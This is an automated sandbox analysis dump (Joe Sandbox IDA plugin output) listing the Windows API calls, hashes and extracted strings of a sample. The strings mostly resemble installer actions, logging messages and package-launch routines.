                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 03844a7cfe8c4f5cb9a635742cd6961c6029d49aefacc4465308f48d6920e05e
                                                    • Instruction ID: f5407a7c57fa2996a77579f3511bbd11ba8d4366367572c180c7f278bacbe77d
                                                    • Opcode Fuzzy Hash: 03844a7cfe8c4f5cb9a635742cd6961c6029d49aefacc4465308f48d6920e05e
                                                    • Instruction Fuzzy Hash: A41102B2300A629F87209F8AC4E0D97F7A8FF54700382412AE9519B731C724FC15C7E4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 00368CF0: EnterCriticalSection.KERNEL32(0063E7BC), ref: 00368D2C
                                                      • Part of subcall function 00368CF0: GetCurrentThreadId.KERNEL32 ref: 00368D40
                                                      • Part of subcall function 00368CF0: LeaveCriticalSection.KERNEL32(0063E7BC), ref: 00368D7F
                                                    • SetWindowLongW.USER32(?,00000004,00000000), ref: 003C8D8D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$CurrentEnterLeaveLongThreadWindow
                                                    • String ID:
                                                    • API String ID: 3550545212-0
                                                    • Opcode ID: 2411c05563d0c4f3e00cccb640e1c745c2d2c0e65d43304673930e2d9f996c08
                                                    • Instruction ID: 3c6c1e8e8bcff7a9adf350a9880e0cbdb99e6cb3d2c036920ca873259a667c7a
                                                    • Opcode Fuzzy Hash: 2411c05563d0c4f3e00cccb640e1c745c2d2c0e65d43304673930e2d9f996c08
                                                    • Instruction Fuzzy Hash: 27F0D1722012125BD632AF68A848E6FBBE8EF847A1B004829F685C7151CB20CC05D7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 00520372: EnterCriticalSection.KERNEL32(00637DCC,?,?,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 0052037D
                                                      • Part of subcall function 00520372: LeaveCriticalSection.KERNEL32(00637DCC,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 005203BA
                                                      • Part of subcall function 00471E40: RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,00000000), ref: 00471EAE
                                                      • Part of subcall function 00471E40: RegQueryValueExW.KERNEL32(00000000,CurrentMajorVersionNumber,00000000,00000000,?,?), ref: 00471EF5
                                                      • Part of subcall function 00471E40: RegQueryValueExW.KERNEL32(00000000,CurrentMinorVersionNumber,00000000,00000000,?,00000004), ref: 00471F14
                                                      • Part of subcall function 00471E40: RegQueryValueExW.ADVAPI32(00000000,CurrentVersion,00000000,00000000,?,?), ref: 00471F43
                                                      • Part of subcall function 00471E40: RegQueryValueExW.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,?,?), ref: 00471FB8
                                                    • __Init_thread_footer.LIBCMT ref: 00471E16
                                                      • Part of subcall function 00520328: EnterCriticalSection.KERNEL32(00637DCC,?,?,0035ACA7,006389FC,005A5FA0), ref: 00520332
                                                      • Part of subcall function 00520328: LeaveCriticalSection.KERNEL32(00637DCC,?,0035ACA7,006389FC,005A5FA0), ref: 00520365
                                                      • Part of subcall function 00520328: RtlWakeAllConditionVariable.NTDLL ref: 005203DC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CriticalQuerySectionValue$EnterLeave$ConditionInit_thread_footerOpenVariableWake
                                                    • String ID:
                                                    • API String ID: 3563064969-0
                                                    • Opcode ID: 1834d12dbeeb919e8119ca263b13f4302ddf298819e61e3f164e07a718fbc284
                                                    • Instruction ID: 92bbd58a5f539bfafbaa521406b55e99c753142517b7f2f73ff6c146decb7c8c
                                                    • Opcode Fuzzy Hash: 1834d12dbeeb919e8119ca263b13f4302ddf298819e61e3f164e07a718fbc284
                                                    • Instruction Fuzzy Hash: DD01F271B40644ABC711DF98DA02B99B7A5F705730F104B3AF927977D1CB3A690087A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,D13B3340,00000000,?,?,00000000,0059487E,000000FF,?,80004005), ref: 004ACC58
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: FileWrite
                                                    • String ID:
                                                    • API String ID: 3934441357-0
                                                    • Opcode ID: 17d72d393d69b4d120e8b6b03485c028f16a3fdc5a0b906816a98f7b0e03b6e6
                                                    • Instruction ID: 0bd42b790edc2de3a4718b91dfac4e5d79e1a0fa4881eaa06a01110115e09e77
                                                    • Opcode Fuzzy Hash: 17d72d393d69b4d120e8b6b03485c028f16a3fdc5a0b906816a98f7b0e03b6e6
                                                    • Instruction Fuzzy Hash: FDF04F71600654BFDB10CF19CC85FABB7ADFB5A724F044219F925E72D0DBB4AD048A94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 00521BFA: RaiseException.KERNEL32(E06D7363,00000001,00000003,D13B3340,?,?,004AC2E8,80004005,D13B3340,?,?), ref: 00521C5A
                                                    • RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AllocateExceptionHeapRaise
                                                    • String ID:
                                                    • API String ID: 3789339297-0
                                                    • Opcode ID: d554cedadab4d03512e8a53871c8e1466e9eee66e8ee2b1a7e719d29dd8c8d50
                                                    • Instruction ID: b4a59e9df4bd5c96924e9807131943de05e0c90ce30cb406044e82e30fb16dca
                                                    • Opcode Fuzzy Hash: d554cedadab4d03512e8a53871c8e1466e9eee66e8ee2b1a7e719d29dd8c8d50
                                                    • Instruction Fuzzy Hash: B6F0A731A44648BFC705CF54DD05F56BFB9FB09B14F004679F915866A0DB36A8049A44
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00000000,00000000,00535FF3,?,0053A198,?,00000000,?,00529D85,00000000,00535FF3,?,?,?,?,00535DED), ref: 00538279
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: f44c46d92821612de8f33a583de4cd56ffdc7a387cae562837b1e97791dbb286
                                                    • Instruction ID: 8db28120e27b958ecdc97cd79b3a456fdf657a5d88e12680fae34d2d208c61b3
                                                    • Opcode Fuzzy Hash: f44c46d92821612de8f33a583de4cd56ffdc7a387cae562837b1e97791dbb286
                                                    • Instruction Fuzzy Hash: 94E06D39545F216ADF2A2766AC08BBB7F49BF823A0F294221FD15960D1EF60DC0485E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $ $$ *$ /$(!$(&$(,$(7$0#$0($0)$0.$100$100$100$100$10000$10000$10000$100000$100000$12000$12000$12000$12000$12000$12000$12000$12000$12000$12000$120000$120000$1500$1500$1500$1500$1500$15000$15000$15000$15000$15000$15000$1500000$1500000$1800$1800$1800$2000$2000$2000$2000$2000$2000$2000$2000$20000$20000$200000$200000$3000$3000$3000$3000$3000$3000$3000$3000$3000$3000$30000$30000$30000$3000000$3000000$500$500$5000$5000$6000$6000$8%$8+$8000$8000$8000$80$@"$@'$@-$AI_AppSearchEx$AI_ChainProductsPseudo$AI_CountRowAction$AI_DefaultActionCost$AI_DownloadPrereq$AI_ExtractPrereq$AI_Game$AI_Game$AI_Game$AI_GxInstall$AI_GxUninstall$AI_InstallPostPrerequisite$AI_InstallPrerequisite$AI_PreRequisite$AI_ProcessAccounts$AI_ProcessGroups$AI_ProcessTasks$AI_ScheduledTasks$AI_UninstallAccounts$AI_UninstallGroups$AI_UninstallTasks$AI_UserAccounts$AI_UserGroups$AI_XmlAttribute$AI_XmlElement$AI_XmlInstall$AI_XmlUninstall$AppId$AppId$AppId$BindImage$Complus$Complus$Component_$CreateFolder$CreateFolders$CreateShortcuts$DuplicateFile$DuplicateFiles$Environment$Extension$Feature$Feature$Feature_$File$File$File$FileSize$Font$Font$H$$H*$H/$IniFile$IniFile$IniFile$InstallFiles$InstallFinalize$InstallInitialize$InstallODBC$InstallServices$Location$MIME$MIME$MIME$MoveFile$MoveFiles$MsiAssembly$MsiConfigureServices$MsiPublishAssemblies$ODBCDataSource$ODBCDriver$ODBCTranslator$Options$Options$Options$P!$P&$P,$P7$Patch$Patch$PatchFiles$PatchSize$ProgId$ProgId$ProgId$PublishComponent$PublishComponents$PublishFeatures$RegisterClassInfo$RegisterComPlus$RegisterExtensionInfo$RegisterFonts$RegisterMIMEInfo$RegisterProgIdInfo$RegisterTypeLibraries$Registry$RemoveDuplicateFiles$RemoveEnvironmentStrings$RemoveFile$RemoveFiles$RemoveFolders$RemoveIniFile$RemoveIniValues$RemoveShortcuts$SelfReg$SelfReg$SelfRegModules$ServiceControl$ServiceInstall$Shortcut$StartServices$TypeLib$TypeLib$UnregisterClassInfo$UnregisterExtensionInfo$UnregisterMIMEInfo$UnregisterProgIdInfo$WriteEnvironmentStrings$WriteIniValues$WriteRegistryValues$X $X#$X($X)$X.$`+$`0$`6$h"$h'$h-$p$$p*$p/$x!$x&$x,$~$"$$$'$*$-$/
                                                    • API String ID: 0-1880133967
                                                    • Opcode ID: ff0160fa4a169b49b42be03a3beb2b0ca0e99aa3a9f1cd480c265e4a948b0788
                                                    • Instruction ID: c64a9d96874e32bbc324180706b23f482a8e92a0b144e19607c5b50dabddee20
                                                    • Opcode Fuzzy Hash: ff0160fa4a169b49b42be03a3beb2b0ca0e99aa3a9f1cd480c265e4a948b0788
                                                    • Instruction Fuzzy Hash: 9A23D220A443C4D6D712DFF84D1AB5D6E63AB62315F14674AB2D13F3E2DBB00688A7D2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $0$12000$12000$12000$12000$15000$15000$15000$2000$2000$3000$3000$3000$3000$3000$3000$3000$30000$30000$800$800$8000$8000$8000$8$8$AppSearch$Complus$Complus$Component$Component_$CostFinalize$CostInitialize$Feature$Feature$Feature_$File$File$FileCost$Font$Font$H$InstallValidate$MsiUnpublishAssemblies$ODBCDataSource$ODBCDriver$ODBCTranslator$ProcessComponents$PublishComponent$Registry$RemoveExistingProducts$RemoveODBC$RemoveRegistry$RemoveRegistryValues$SelfReg$SelfReg$SelfUnregModules$ServiceControl$StopServices$UnpublishComponents$UnpublishFeatures$UnregisterComPlus$UnregisterFonts$X$`%$`$h$p$u$x
                                                    • API String ID: 0-2370279709
                                                    • Opcode ID: 41e24130abdad17d222c819939d9c1bb1f21ca0672607f1ff78e6bb4c6cff713
                                                    • Instruction ID: ed79c7edf5397cfd417f5c7c802bceac1bde82980899f43df1ac949f4cf38a24
                                                    • Opcode Fuzzy Hash: 41e24130abdad17d222c819939d9c1bb1f21ca0672607f1ff78e6bb4c6cff713
                                                    • Instruction Fuzzy Hash: 89C27060E5578496E341CF70ED5A7967BA3AB62309F24A309F1452A2E1DBF412C8CFE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNEL32(006394F4,C0000000,00000003,00000000,00000004,00000080,00000000,D13B3340,006394D0,006394E8,?), ref: 0049FC70
                                                    • GetLastError.KERNEL32 ref: 0049FC8D
                                                    • OutputDebugStringW.KERNEL32(00000000,00000020), ref: 0049FD06
                                                    • OutputDebugStringW.KERNEL32(00000000,?,0000001C), ref: 0049FE0A
                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0000001C), ref: 0049FE7B
                                                    • WriteFile.KERNEL32(00000000,00E1B780,?,00000000,00000000,?,0000001C), ref: 0049FEAB
                                                    • WriteFile.KERNEL32(00000000,000000B7,?,00000000,00000000,005B5F2C,00000002), ref: 0049FF56
                                                    • FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0000001C), ref: 0049FF5F
                                                    • FlushFileBuffers.KERNEL32(00000000,?,0000001C), ref: 0049FEB0
                                                      • Part of subcall function 0035A140: FindResourceW.KERNEL32(00000000,?,00000006,?,?,000000A0,80070057,8007000E,80004005,00371A24,00000000,?,?,?,*.*), ref: 0035A163
                                                    • OutputDebugStringW.KERNEL32(00000000,?,0000001D), ref: 004A0053
                                                    • WriteFile.KERNEL32(00000000,00000000,00000002,?,00000000,?,0000001D), ref: 004A00D9
                                                    • FlushFileBuffers.KERNEL32(00000000,?,0000001D), ref: 004A00E4
                                                    • WriteFile.KERNEL32(00000000,000000FF,?,00000000,00000000,005B5F2C,00000002,?,?,CPU: ,00000005), ref: 004A0158
                                                    • FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0000001C), ref: 004A0161
                                                    • WriteFile.KERNEL32(00000000,000000B7,?,00000000,00000000,005B5F2C,00000002), ref: 004A01E6
                                                    • FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0000001C), ref: 004A01EF
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: File$BuffersFlushWrite$DebugOutputString$Init_thread_footer$CreateErrorFindHeapLastPointerProcessResource
                                                    • String ID: ,_[$CPU: $LOGGER->Creating LOG file at:$LOGGER->Reusing LOG file at:$LOGGER->failed to create LOG at:$OS Version: %u.%u.%u SP%u (%s) [%s]$server$workstation$x64$x86
                                                    • API String ID: 4051163352-3468187980
                                                    • Opcode ID: 1116a6ac1799d9f6a65944f850801308f633d00df17b7eb2f1bc9debebe6bb8c
                                                    • Instruction ID: db15cb28dffc239e768313e174ae708b284c50065e853d2f42cea8d0643c3ca6
                                                    • Opcode Fuzzy Hash: 1116a6ac1799d9f6a65944f850801308f633d00df17b7eb2f1bc9debebe6bb8c
                                                    • Instruction Fuzzy Hash: 0D12BE70A016099FDB10DF68CC49BAEBBB4FF55314F1482A9E805EB2A2DB74DD08DB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • lstrcmpiW.KERNEL32(?,?,msix,00000004,?,?,?,?,?, ?(-|/)+q,005B7BBE), ref: 0038BAEE
                                                    • lstrcmpiW.KERNEL32(?,?,msixbundle,0000000A,msix,00000004,?,?,?,?,?, ?(-|/)+q,005B7BBE), ref: 0038BC6E
                                                    • GetCurrentThreadId.KERNEL32 ref: 0038BE2B
                                                    • std::locale::_Init.LIBCPMT ref: 0038B827
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    • Sleep.KERNEL32(000007D0,?,?,?,?,?,?,?,?,?,?, ?(-|/)+q,005B7BBE), ref: 0038C183
                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 0038C1EF
                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 0038C1F6
                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 0038C1FD
                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 0038C213
                                                    • GetCurrentThreadId.KERNEL32 ref: 0038C3FE
                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 0038C50F
                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 0038C516
                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 0038C51D
                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 0038C524
                                                      • Part of subcall function 003711B0: FindClose.KERNEL32(00000000), ref: 003712EF
                                                      • Part of subcall function 003711B0: PathIsUNCW.SHLWAPI(?,*.*,00000000), ref: 003713A7
                                                      • Part of subcall function 0046FDA0: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,D13B3340,?,00000000), ref: 0046FDEB
                                                      • Part of subcall function 0046FDA0: GetLastError.KERNEL32(?,00000000), ref: 0046FDF5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Cpp_errorThrow_std::_$CurrentInit_thread_footerThreadlstrcmpi$CloseErrorFindFormatHeapInitLastMessagePathProcessSleepstd::locale::_
                                                    • String ID: ?(-|/)+q$($Launch failed. Error:$Launching file:$Return code of launched file:$appx$msix$msixbundle
                                                    • API String ID: 3689723087-3482523422
                                                    • Opcode ID: 73189733bc86e1ed2dae495245128051d411ec25559f45b920053e6350a03767
                                                    • Instruction ID: eef86c782c040fe921106de2b5115f052eb98dc2e4ab9025916e7dfb412b0286
                                                    • Opcode Fuzzy Hash: 73189733bc86e1ed2dae495245128051d411ec25559f45b920053e6350a03767
                                                    • Instruction Fuzzy Hash: CF92B071D00219CFDB25DFA8C845BEDBBB0BF45314F258299E415AB292EB706A85CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 00365A10: EnterCriticalSection.KERNEL32(0063E7BC,D13B3340,00000000,?,?,?,?,?,?,>R6,0054B23D,000000FF), ref: 00365A4D
                                                      • Part of subcall function 00365A10: LoadCursorW.USER32(00000000,00007F00), ref: 00365AC8
                                                      • Part of subcall function 00365A10: LoadCursorW.USER32(00000000,00007F00), ref: 00365B6E
                                                    • SysFreeString.OLEAUT32(00000000), ref: 00365623
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0036572B
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0036573B
                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00365746
                                                    • NtdllDefWindowProc_W.NTDLL(?,?,00000001,?), ref: 00365754
                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00365762
                                                    • SetWindowTextW.USER32(?,005B329C), ref: 00365801
                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00365836
                                                    • GlobalLock.KERNEL32 ref: 00365844
                                                    • GlobalUnlock.KERNEL32(?), ref: 00365898
                                                    • SetWindowLongW.USER32(?,000000EB,00000000), ref: 00365923
                                                    • SysFreeString.OLEAUT32(00000000), ref: 0036593C
                                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,00000000), ref: 00365983
                                                    • SysFreeString.OLEAUT32(00000000), ref: 003659A2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$FreeGlobalString$CursorLoadNtdllProc_$AllocCriticalEnterLockSectionTextUnlock
                                                    • String ID: >R6$>R6
                                                    • API String ID: 1808742688-1283833623
                                                    • Opcode ID: f00f0a732b2b84ba29858773a76b9404cf78376764a69cd3a3203cbb39756fe0
                                                    • Instruction ID: 26a9c0fa4c3bec8fe272e9a7f6e6e0e12e2744e4c8fc51a43da66a09feaa497a
                                                    • Opcode Fuzzy Hash: f00f0a732b2b84ba29858773a76b9404cf78376764a69cd3a3203cbb39756fe0
                                                    • Instruction Fuzzy Hash: 97D1C171A00609EFDB12DFA4CC48BAFBBB9EF45320F148168F911A7295D7759A04CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SysFreeString.OLEAUT32(00000000), ref: 0037C697
                                                    • SysFreeString.OLEAUT32(00000000), ref: 0037C82C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
